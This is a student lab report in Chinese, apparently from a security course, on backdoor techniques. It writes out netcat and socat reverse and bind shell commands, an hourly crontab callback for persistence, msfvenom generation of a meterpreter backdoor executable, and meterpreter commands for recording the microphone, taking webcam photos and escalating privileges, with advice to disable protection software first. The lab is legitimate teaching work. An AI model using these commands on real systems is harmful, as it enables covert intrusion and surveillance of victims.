1. 程式人生 > >20155216 Exp2 後門原理與實踐

20155216 Exp2 後門原理與實踐

hand 地址 同時 bin log code 文字 其他 進行

後門原理與實踐

常用後門工具

NC 或 netcat

netcat是一個底層工具,進行基本的TCP UDP數據收發。常被與其他工具結合使用,起到後門的作用。

Linux: 一般自帶netcat,"man netcat" 或"man nc"可查看其使用說明。

技術分享圖片

Win獲得Linux Shell

1、windows 打開監聽

先解壓ncat.rar,使用Dos命令行,進入ncat文件夾運行可執行文件ncat.exe。使用 ncat.exe -l -p 5216 使5216端口處於監聽狀態。

2、Linux反彈連接win

使用ipconfig查詢主機IP地址。

技術分享圖片

使用 nc 192.168.1.104 5216 -e /bin/sh

3、windows下獲得一個linux shell

可運行任何指令,如ls:

技術分享圖片

Linux獲得Win Shell

1、Linux運行監聽指令

Linux下輸入命令 nc -l -p 5216

2、.Windows反彈連接Linux

使用 ifconfig 查看Linux的IP地址。

技術分享圖片

使用Dos命令行輸入 ncat.exe -e cmd.192.168.253.128 5216

3.Linux下看到Windows的命令提示

技術分享圖片

Netcat擴展知識

nc傳輸數據

1、Windows下監聽5216端口: ncat.exe -l -p 5216

2、Kali下連接到Windows的5216端口: nc -l -p 5216

3、建立之後進行文字傳輸

windows再啟動一個Dos界面,輸入 ncat.exe -l 5216

技術分享圖片

Kali再起另一終端,輸入 nc 192.168.1.104 5216

技術分享圖片

之後進行文本傳輸。

使用netcat獲取主機操作Shell

1、先在Windows系統下,監聽5216端口。

2、用crontab -e指令編輯一條定時任務,選擇編輯器時選擇3 basic vim編輯器。

3、在最後一行添加 45 * * * * /bin/netcat 192.168.1.104 5216 -e /bin/sh

即在每個小時的第45分鐘反向連接Windows主機的5216端口。

技術分享圖片

在第45分鐘,連接成功。

技術分享圖片

使用socat獲取主機操作Shell

1、在Windows系統下,打開控制面板下搜索任務計劃開始創建任務,填寫任務名稱後,新建一個觸發器

技術分享圖片

2、在操作->程序或腳本中選擇socat.exe文件的路徑,在添加參數一欄填寫 tcp-listen:5216 exec:cmd.exe,pty,stderr ,這個命令的作用是把cmd.exe綁定到端口5216,同時把cmd.exe的stderr重定向到stdout上:

技術分享圖片

3、創建完成之後運行。

技術分享圖片

此時彈出一個命令端:

技術分享圖片

4、此時,在Kali環境下輸入指令socat - tcp:192.168.1.104:5216,這裏的第一個參數-代表標準的輸入輸出,使第二個流連接到Windows主機的5216端口,此時可以發現已經成功獲得了一個cmd shell:

技術分享圖片

使用MSF meterpreter生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell

1、輸入指令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.15.132 LPORT=4312 -f exe > 20154312_backdoor.exe 生成後門程序。

技術分享圖片

2、通過nc指令將生成的後門程序傳送到Windows主機上

kali端使用命令: nc 192.168.1.104 5216 < 20155216_backdoor.exe 傳送程序。

windows端使用命令: ncat.exe -l 5216 > 20155216_backdoor.exe 接受程序。

ps:如果無法使用命令進行傳送,也可手動將後門程序拷貝至windows;傳輸後門程序之前,先將主機的防護軟件關閉。

3、在Kali上使用 msfconsole 指令進入msf控制臺,輸入命令 use exploit/multi/handler 使用監聽模塊,使用命令 set payload windows/meterpreter/reverse_tcp 設置payload,設置反彈回連的IP和端口:

技術分享圖片

4、設置完成後,執行監聽:

技術分享圖片

5、打開Windows上的後門程序:

使用MSF meterpreter生成獲取目標主機音頻、攝像頭等內容,並嘗試提權

可使用record_mic指令截獲一段音頻

也可嘗試使用webcam_snap指令可以使用攝像頭進行拍照

技術分享圖片

技術分享圖片

先使用getuid指令查看當前用戶,並使用getsystem指令進行提權

技術分享圖片

可能是因為windows8.1的環境問題,無法進行提權。

20155216 Exp2 後門原理與實踐